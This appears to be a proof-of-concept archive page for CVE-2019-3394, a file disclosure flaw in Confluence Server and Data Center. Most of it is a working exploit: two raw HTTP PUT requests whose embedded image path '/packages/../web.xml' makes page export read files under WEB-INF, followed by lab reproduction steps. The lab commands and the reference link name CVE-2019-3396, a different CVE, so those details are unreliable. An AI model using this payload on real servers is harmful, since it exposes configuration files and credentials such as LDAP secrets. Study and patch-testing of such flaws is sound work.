Associated Vulnerability
Title:Atlassian Confluence Server和Confluence Data Center 信任管理问题漏洞 (CVE-2019-3394)Description:There was a local file disclosure vulnerability in Confluence Server and Confluence Data Center via page exporting. An attacker with permission to editing a page is able to exploit this issue to read arbitrary file on the server under <install-directory>/confluence/WEB-INF directory, which may contain configuration files used for integrating with other services, which could potentially leak credentials or other sensitive information such as LDAP credentials. The LDAP credential will be potentially leaked only if the Confluence server is configured to use LDAP as user repository. All versions of Confluence Server from 6.1.0 before 6.6.16 (the fixed version for 6.6.x), from 6.7.0 before 6.13.7 (the fixed version for 6.13.x), and from 6.14.0 before 6.15.8 (the fixed version for 6.15.x) are affected by this vulnerability.
Description
Confluence(<install-directory>/confluence/WEB-INF/)文件读取漏洞
Readme
# CVE-2019-3394
Confluence(install-directory>/confluence/WEB-INF/)文件读取漏洞
## BurpSuite Request
#### vuln_url http://10.10.20.166:8090/rest/api/content/65610?status=draft
```
PUT /rest/api/content/65610?status=draft HTTP/1.1
Host: 10.10.20.166:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://10.10.20.166:8090/pages/resumedraft.action?draftId=65610&draftShareId=58f4ea64-a2bd-473d-93ce-157cf3c229f3
Content-Length: 490
Cookie: JSESSIONID=FFD0CA6A6268E12E69A566AAD965B17A
X-Forwarded-For: 127.0.0.1
Connection: close
{"status":"current","title":"test","space":{"key":"JAS"},"body":{"editor":{"value":"<p><img class=\"confluence-embedded-image confluence-external-resource\" style=\"max-height: 250px;\" src=\"http://10.10.20.166:8090/packages/../web.xml\" data-image-src=\"/packages/../web.xml\" /></p>","representation":"editor","content":{"id":"65610"}}},"id":"65610","type":"page","version":{"number":1,"minorEdit":true,"syncRev":"0.mlIer8AOrlZcj7dg7IWDwUc.5"},"ancestors":[{"id":"65586","type":"page"}]}
```
#### change
`src=\"http://10.10.20.166:8090/packages/../web.xml\"`
to
`src=\"/packages/../web.xml\"`
```
PUT /rest/api/content/65610?status=draft HTTP/1.1
Host: 10.10.20.166:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://10.10.20.166:8090/pages/resumedraft.action?draftId=65610&draftShareId=58f4ea64-a2bd-473d-93ce-157cf3c229f3
Content-Length: 490
Cookie: JSESSIONID=FFD0CA6A6268E12E69A566AAD965B17A
X-Forwarded-For: 127.0.0.1
Connection: close
{"status":"current","title":"test","space":{"key":"JAS"},"body":{"editor":{"value":"<p><img class=\"confluence-embedded-image confluence-external-resource\" style=\"max-height: 250px;\" src=\"/packages/../web.xml\" data-image-src=\"/packages/../web.xml\" /></p>","representation":"editor","content":{"id":"65610"}}},"id":"65610","type":"page","version":{"number":1,"minorEdit":true,"syncRev":"0.mlIer8AOrlZcj7dg7IWDwUc.5"},"ancestors":[{"id":"65586","type":"page"}]}
```
## 0x00 简介
Confluence Server 和 Data Center 在页面导出功能中存在本地文件泄露漏洞:具有“添加页面”空间权限的远程攻击者,能够读取 <install-directory>/confluence/WEB-INF/ 目录下的任意文件。
该目录可能包含用于与其他服务集成的配置文件,可能会泄漏认证凭据,例如 LDAP 认证凭据或其他敏感信息。
### 漏洞影响版本:
6.1.0 <= version < 6.6.16
6.7.0 <= version < 6.13.7
6.14.0 <= version < 6.15.8
## 0x01 CVE-2019-3394漏洞复现过程
### 测试环境: Atlassian Confluence 6.10.2
`root@kali:~/vulhub/confluence/CVE-2019-3396# docker-compose up -d`
```
root@kali:~/vulhub/confluence/CVE-2019-3396# docker-compose up -d
cve-2019-3396_db_1 is up-to-date
cve-2019-3396_web_1 is up-to-date
root@kali:~/vulhub/confluence/CVE-2019-3396# docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
ab287d68d994 vulhub/confluence:6.10.2 "/docker-entrypoint.…" 2 hours ago Up 2 hours 0.0.0.0:8090->8090/tcp, 8091/tcp cve-2019-3396_web_1
1f58f73d5349 postgres:10.7-alpine "docker-entrypoint.s…" 2 hours ago Up 2 hours 5432/tcp cve-2019-3396_db_1
```
`/opt/atlassian/confluence/confluence/WEB-INF`
目录下的文件
```
./admin/longrunningtask-xml.vm
./WEB-INF/glue-config.xml
./WEB-INF/urlrewrite.xml
./WEB-INF/web.xml
./WEB-INF/decorators.xml
./WEB-INF/sitemesh.xml
./WEB-INF/lib/batik-xml-1.9.jar
./WEB-INF/lib/xml-apis-ext-1.3.04.jar
./WEB-INF/lib/atlassian-secure-xml-3.2.11.jar
./WEB-INF/lib/xmlrpc-supplementary-character-support-0.2.jar
./WEB-INF/lib/xmlgraphics-commons-2.2.jar
./WEB-INF/lib/xmlrpc-2.0+xmlrpc61.1+sbfix.jar
./WEB-INF/classes/seraph-config.xml
./WEB-INF/classes/seraph-paths.xml
./importexport/includes/export-xml.vm
./search/osd.xml
./META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml
```
## 参考链接:
https://github.com/vulhub/vulhub/blob/master/confluence/CVE-2019-3396/README.md
File Snapshot
[4.0K] /data/pocs/6a5138140fa31e4786f493b7029eb32438669b5b
└── [4.6K] README.md
0 directories, 1 file
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →